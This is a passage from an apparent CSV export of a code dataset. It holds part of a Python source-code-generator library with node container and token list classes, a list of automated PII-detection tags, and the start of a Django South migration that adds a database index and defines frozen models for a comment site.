else:
self.node_classinfo = node_classinfo_tuple
if node_factory is None:
# If the node_classinfo is None, then self.node_classinfo contains default_node_classinfo
# which is only composed of NodeABC, and therefore cannot be used as a factory
if node_classinfo is None:
raise ValueError(
'You must specify a node factory or give a class that can be used as a factory as first item of node_classinfo'
)
# The first element in the tuple is taken as the factory
node_factory = self.node_classinfo[0]
# A wrapper to make sure that the output of the node_factory is
# indeed a NodeABC
def make_node_factory_wrapper(factory):
def wrapper(node):
result = factory(node)
if not isinstance(result, NodeABC):
raise ValueError(""The node factory did not give a NodeABC"")
else:
return result
return wrapper
self.node_factory = make_node_factory_wrapper(node_factory)
self.node_list = [
item if isinstance(item, self.node_classinfo) else self.node_factory(item)
for item in node_list
]
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
""""""Print all the contained nodes using their *freestanding_str* method,
because a container is a freestanding context.
It also strips the blank lines at the beginning.
""""""
snippet = """"
for node in self.node_list:
if hasattr(node, 'comment'):
snippet += node.comment.freestanding_str(idt)
snippet += node.freestanding_str(idt)
return strip_starting_blank_lines(snippet)
def freestanding_str(self, idt=None):
""""""Calls super().freestanding_str, and strip the blank lines
at the beginning.
""""""
snippet = super().freestanding_str(idt)
return strip_starting_blank_lines(snippet)
def __copy__(self):
cls = type(self)
new_obj = cls.__new__(cls)
new_obj.__dict__.update(self.__dict__)
new_obj.node_list = copy.copy(self.node_list)
new_obj.node_classinfo = copy.copy(self.node_classinfo)
new_obj.node_factory = copy.copy(self.node_factory)
return new_obj
def clear(self):
# We preserve the object itself; we do not build a new one
self[:] = []
def insert(self, index, value):
elem_list = listify(value)
for i, elem in enumerate(elem_list):
if not isinstance(elem, self.node_classinfo):
elem = self.node_factory(elem)
self.node_list.insert(index+i, elem)
def index(self, *args, **kwargs):
return self.node_list.index(*args, **kwargs)
def count(self, *args, **kwargs):
return self.node_list.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self.node_list.pop(*args, **kwargs)
def reverse(self):
self.node_list.reverse()
def remove(self, *args, **kwargs):
self.node_list.remove(*args, **kwargs)
@abc.abstractmethod
def __add__(self, other):
return type(self)((self, other))
@abc.abstractmethod
def __radd__(self, other):
return type(self)((other, self))
def __iadd__(self, other):
other_list = listify(other)
typed_other_list = [
item if isinstance(item, self.node_classinfo) else self.node_factory(item)
for item in other_list
]
self.node_list.extend(typed_other_list)
return self
def append(self, other):
self.__iadd__(other)
def extend(self, other_list):
other_list = listify(other_list)
for other in other_list:
self.append(other)
def __mul__(self, other):
if isinstance(other, numbers.Integral):
self_copy = copy.copy(self)
self_copy.node_list = self.node_list * other
return self_copy
else:
return NotImplemented
def __rmul__(self, other):
return self.__mul__(other)
def __imul__(self, other):
if isinstance(other, numbers.Integral):
self.node_list *= other
return self
else:
return NotImplemented
def __contains__(self, item):
return item in self.node_list
def __reversed__(self):
return reversed(self.node_list)
def __getitem__(self, key):
return self.node_list[key]
def __setitem__(self, key, value):
if not isinstance(value, self.node_classinfo):
value = self.node_factory(value)
self.node_list[key] = value
def __delitem__(self, key):
del self.node_list[key]
def __len__(self):
return len(self.node_list)
def __iter__(self):
return iter(self.node_list)
class TokenListABC(NodeBase, NonIterable, collections.MutableSequence):
""""""This class is an abstract base class for all classes that are token lists.
A token list is an object that holds a sequence of tokens, which get concatenated when printed.
The tokens are turned into strings only when the token list is printed, which is why it is
the lazy building blocks of source code constructs like expressions and many others.
Whan printed, the token list should call *inline_str* on its tokens if the token is a :class:`NodeABC`,
or the builtin :func:`str` otherwise.
""""""
pass
class DelegatedTokenListBase(TokenListABC):
""""""This is the base class for token lists classes that forward the calls to the :class:`TokenListABC` API
to an attribute.
This class implements stubs to allow transparent object composition.
""""""
@property
def tokenlist_attr(self):
""""""This property gives the attribute holding the real token list.""""""
attr = getattr(self, self.tokenlist_attr_name)
if not isinstance(attr, TokenListABC):
raise AttributeError('The attribute '+self.tokenlist_attr_name+' is not a TokenListABC')
else:
return attr
@tokenlist_attr.setter
def tokenlist_attr(self, value):
return setattr(self, self.tokenlist_attr_name, value)
def __init__(self, tokenlist_attr_name, *args, **kwargs):
""""""
:param tokenlist_attr_name: the name of the attribute holding the real token list
""""""
self.tokenlist_attr_name = tokenlist_attr_name
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
return self.tokenlist_attr.inline_str(idt)
def freestanding_str(self, idt=None):
return self.tokenlist_attr.freestanding_str(idt)
def index(self, *args, **kwargs):
return self.tokenlist_attr.index(*args, **kwargs)
def insert(self, *args, **kwargs):
return self.tokenlist_attr.insert(*args, **kwargs)
def count(self, *args, **kwargs):
return self.tokenlist_attr.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self.tokenlist_attr.pop(*args, **kwargs)
def reverse(self):
self.tokenlist_attr.reverse()
def remove(self, *args, **kwargs):
self.tokenlist_attr.remove(*args, **kwargs)
def __add__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__add__(other)
return self_copy
def __radd__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__radd__(other)
return self_copy
def append(self, other):
self.tokenlist_attr.append(other)
def __iadd__(self, *args, **kwargs):
self.tokenlist_attr.__iadd__(*args, **kwargs)
return self
def extend(self, other_list):
self.tokenlist_attr.extend(other_list)
def __mul__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__mul__(other)
return self_copy
def __rmul__(self, *args, **kwargs):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__rmul__(*args, **kwargs)
return self_copy
def __imul__(self, other):
self.tokenlist_attr.__imul__(other)
return self
def __contains__(self, *args, **kwargs):
return self.tokenlist_attr.__contains__(*args, **kwargs)
def __iter__(self):
return self.tokenlist_attr.__iter__()
def __reversed__(self):
return self.tokenlist_attr.__reversed__()
def __getitem__(self, key):
return self.tokenlist_attr.__getitem__(key)
def __setitem__(self, key, value):
self.tokenlist_attr.__setitem__(key, value)
def __delitem__(self, key):
self.tokenlist_attr.__delitem__(key)
def __len__(self):
return self.tokenlist_attr.__len__()
class TokenListBase(TokenListABC):
""""""This base class implements the :class:`TokenListABC` API with all of the operators overloading logic.
""""""
def __init__(self, token_list=None, *args, **kwargs):
""""""
:param token_list: the list of tokens to store inside the token list
""""""
self._token_list = listify(token_list)
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
""""""Print the tokens of the token list usin, and concatenate all the strings.
If the token is a :class:`NodeABC`, its *inline_str* method is used.
otherwise, :func:`str` builtin is called on the token.
""""""
string = ''
for token in self._token_list:
if token is self:
# Special handling of self: this allows the list to print itself using
# a different method, both to avoid infinite recursion and to provide
# a means for subclasses to implement self-printing without creating a
# "self-printer" class dedicated to printing themselves
string += self.self_inline_str(idt)
elif isinstance(token, NodeABC):
string += token.inline_str(idt)
else:
string += str(token)
return string
def index(self, *args, **kwargs):
return self._token_list.index(*args, **kwargs)
def insert(self, *args, **kwargs):
return self._token_list.insert(*args, **kwargs)
def count(self, *args, **kwargs):
return self._token_list.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self._token_list.pop(*args, **kwargs)
def reverse(self):
self._token_list.reverse()
def remove(self, *args, **kwargs):
self._token_list.remove(*args, **kwargs)
def __add__(self, other):
if isinstance(other, TokenListABC):
other_list = list(other)
self_copy = copy.copy(self)
self_copy._token_list = self._token_list+other_list
return self_copy
# The result of the addition with a NodeContainer is a NodeContainer
elif isinstance(other, NodeContainerBase):
return other.__radd__(self)
else:
other_list = listify(other)
self_copy = copy.copy(self)
self_copy._token_list = self._token_list+other_list
return self_copy
def __radd__(self, other):
other_list = listify(other)
self_copy = copy.copy(self)
self_copy._token_list = other_list+self._token_list
return self_copy
def append(self, other):
if isinstance(other, TokenListABC):
other_list = tuple(other)
else:
other_list = listify(other)
self._token_list.extend(other_list)
return self
def __iadd__(self, *args, **kwargs):
self.append(*args, **kwargs)
return self
def extend(self, other_list):
other_list = listify(other_list)
for other in other_list:
self.append(other)
def __mul__(self, other):
if isinstance(other, numbers.Integral):
self_copy = copy.copy(self)
self_copy._token_list = self._token_list * other
return self_copy
else:
return NotImplemented
def __rmul__(self, *args, **kwargs):
return self.__mul__(*args, **kwargs)
def __imul__(self, other):
if isinstance(other, numbers.Integral):
self._token_list *= other
return self
else:
return NotImplemented
def __contains__(self, *args, **kwargs):
return self._token_list.__contains__(*args, **kwargs)
def __iter__(self):
return iter(self._token_list)
def __reversed__(self):
return reversed(self._token_list)
def __getitem__(self, key):
return self._token_list[key]
def __setitem__(self, key, value):
self._token_list[key] = value
def __delitem__(self, key):
del self._token_list[key]
def __len__(self):
return len(self._token_list)
class _IndentedTokenListBase:
""""""This class is the base class that implements a token list which indents its content when printed.""""""
def inline_str(self, idt=None):
idt = Indentation.ensure_idt(idt)
snippet = super().inline_str(idt)
indented_new_line = ""\n""+str(idt)
snippet = snippet.replace(""\n"", indented_new_line)
return snippet
class IndentedTokenListBase(_IndentedTokenListBase, TokenListBase):
""""""This class is a base class for token lists that indent their content when printed.""""""
pass
class IndentedDelegatedTokenListBase(_IndentedTokenListBase, DelegatedTokenListBase):
""""""This is a mix between :class:`DelegatedTokenListBase` and :class:`IndentedTokenListBase`.""""""
pass
class BacktraceBase(TokenListBase, NonIterable, metaclass=abc.ABCMeta):
""""""This base class allows the instances to record the backtrace of the Python code that
created them.
This allows one to add comments in generated source code showing which file and line of the Python
script was responsible for creating it. This is a facility when debugging the source code generator,
and can avoid headache when ones want to track down which line of Python generated which line of
generated source code.
As a convenience, it is a subclass of :class:`TokenListBase` so it can be used inside a comment for example.
""""""
__frame_format_string = '{filename}:{lineno}({function})'
__frame_joiner = ', '
def __init__(self, level=0, *args, **kwargs):
stack = inspect.stack()
self.stack_frame_list = [
frame[1:] for frame in stack
if os.path.dirname(frame[1]) != os.path.dirname(__file__)
]
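# Note: *self* is deliberately passed as the token list below, so that
# TokenListBase.inline_str() hits its "token is self" branch and renders
# this instance through self_inline_str()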
super().__init__(self, *args, **kwargs)
@abc.abstractmethod
def freestanding_str(self, idt=None):
# Construct a comment by giving itself as a token, and use the comment's freestanding_str method
pass
def self_inline_str(self, idt=None):
return self.__frame_joiner.join(
self.__frame_format_string.format(
filename = os.path.relpath(frame[0]),
lineno = frame[1],
function = frame[2],
line_content = frame[3][frame[4]] if frame[3] is not None else ''
) for frame in self.stack_frame_list
)
",41613,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'lower_underscore_case'], ['PERSON', ""bases[0].__dict__['_'+bases[0].__name__+'__format_string""], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self.comment'], ['PERSON', 'decl'], ['PERSON', 'freestanding_str'], ['PERSON', 'decl'], ['LOCATION', 'self.descriptor.__set__(instance'], ['PERSON', 'freestanding_str = inline_str\n\n'], ['PERSON', 'default_node_classinfo ='], ['PERSON', ""ValueError('node_classinfo""], ['NRP', 'node_list'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['PERSON', '@abc.abstractmethod'], ['PERSON', '@abc.abstractmethod'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self_copy.node_list'], ['LOCATION', 'self.node_classinfo'], ['PERSON', 'Whan'], ['PERSON', '@tokenlist_attr.setter\n def'], ['LOCATION', 'TokenListBase'], ['LOCATION', 'IndentedDelegatedTokenListBase(_IndentedTokenListBase'], ['PERSON', '@abc.abstractmethod'], ['PERSON', 'lineno ='], ['PERSON', 'line_content = frame[3][frame[4]'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'collections.It'], ['URL', 'collections.It'], ['URL', 'token.ca'], ['URL', 'token.ca'], ['URL', 'idt.in'], ['URL', 'numbers.Int'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'collections.It'], ['URL', 'NodeABC.in'], ['URL', 'NodeABC.se'], ['URL', 'self.in'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'inspect.is'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'parent.ad'], ['URL', 'self.in'], ['URL', 'self.de'], ['URL', 'decl.fr'], ['URL', 'self.de'], ['URL', 'defi.fr'], ['URL', 'self.fr'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.pa'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'collections.Mu'], ['URL', 'collections.Mu'], ['URL', 'self.no'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'node.comment.fr'], ['URL', 'node.fr'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'copy.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 
'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'collections.Mu'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.se'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.fr'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.co'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.se'], ['URL', 'token.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.co'], ['URL', 'list.re'], ['URL', 'list.re'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'snippet.re'], ['URL', 'inspect.st'], ['URL', 'self.st'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'joiner.jo'], ['URL', 'string.fo'], ['URL', 'os.path.re'], ['URL', 'self.st']]"
41,"# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
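# Creates a composite index over (id, visibility, parent_comment_id) on canvas_comment via raw SQL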
db.execute(""create index canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment (id, visibility, parent_comment_id);"")
def backwards(self, orm):
raise RuntimeError(""Cannot reverse this migration."")
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'canvas.apiapp': {
'Meta': {'object_name': 'APIApp'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'canvas.apiauthtoken': {
'Meta': {'unique_together': "(('user', 'app'),)", 'object_name': 'APIAuthToken'},
'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.APIApp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.bestof': {
'Meta': {'object_name': 'BestOf'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'best_of'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}),
'chosen_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'best_of'", 'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {})
},
'canvas.category': {
'Meta': {'object_name': 'Category'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}),
'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}),
'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'founded_groups'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'moderated_categories'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.comment': {
'Meta': {'object_name': 'Comment'},
'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'127.0.0.1'", 'max_length': '15'}),
'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'replies'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Comment']"}),
'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['canvas.Content']"}),
'posted_on_quest_of_the_day': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}),
'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'used_in_comments'", 'null': 'True', 'to': "orm['canvas.Content']"}),
'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}),
'skip_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'star_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.commentflag': {
'Meta': {'object_name': 'CommentFlag'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'flags'"", 'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'type_id': ('django.db.models.fields.IntegerField', [], {}),
'undone': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'flags'"", 'to': ""orm['auth.User']""})
},
'canvas.commentmoderationlog': {
'Meta': {'object_name': 'CommentModerationLog'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'null': 'True'}),
'note': ('django.db.models.fields.TextField', [], {}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'moderated_comments_log'"", 'to': ""orm['auth.User']""}),
'visibility': ('django.db.models.fields.IntegerField', [], {})
},
'canvas.commentpin': {
'Meta': {'object_name': 'CommentPin'},
'auto': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""})
},
'canvas.commentsticker': {
'Meta': {'object_name': 'CommentSticker'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'stickers'"", 'to': ""orm['canvas.Comment']""}),
'epic_message': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '140', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'type_id': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['auth.User']"", 'null': 'True', 'blank': 'True'})
},
'canvas.commentstickerlog': {
'Meta': {'object_name': 'CommentStickerLog'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""})
},
'canvas.content': {
'Meta': {'object_name': 'Content'},
'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'default': ""'127.0.0.1'"", 'max_length': '15'}),
'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'remixes'"", 'null': 'True', 'to': ""orm['canvas.Content']""}),
'remix_text': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '1000', 'blank': 'True'}),
'source_url': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '4000', 'blank': 'True'}),
'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': ""'used_as_stamp'"", 'blank': 'True', 'to': ""orm['canvas.Content']""}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.ContentUrlMapping']"", 'null': 'True', 'blank': 'True'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.contenturlmapping': {
'Meta': {'object_name': 'ContentUrlMapping'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'canvas.emailunsubscribe': {
'Meta': {'object_name': 'EmailUnsubscribe'},
'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'canvas.externalcontent': {
'Meta': {'object_name': 'ExternalContent'},
'_data': ('django.db.models.fields.TextField', [], {'default': ""'{}'""}),
'content_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'external_content'"", 'to': ""orm['canvas.Comment']""}),
'source_url': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '4000', 'null': 'True', 'blank': 'True'})
},
'canvas.facebookinvite': {
'Meta': {'object_name': 'FacebookInvite'},
'fb_message_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invited_fbid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'facebook_invited_from'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'facebook_sent_invites'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""})
},
'canvas.facebookuser': {
'Meta': {'object_name': 'FacebookUser'},
'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'fb_uid': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'gender': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_invited': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': ""orm['auth.User']"", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'canvas.followcategory': {
'Meta': {'unique_together': ""(('user', 'category'),)"", 'object_name': 'FollowCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'followers'"", 'to': ""orm['canvas.Category']""}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'following'"", 'to': ""orm['auth.User']""})
},
'canvas.invitecode': {
'Meta': {'object_name': 'InviteCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
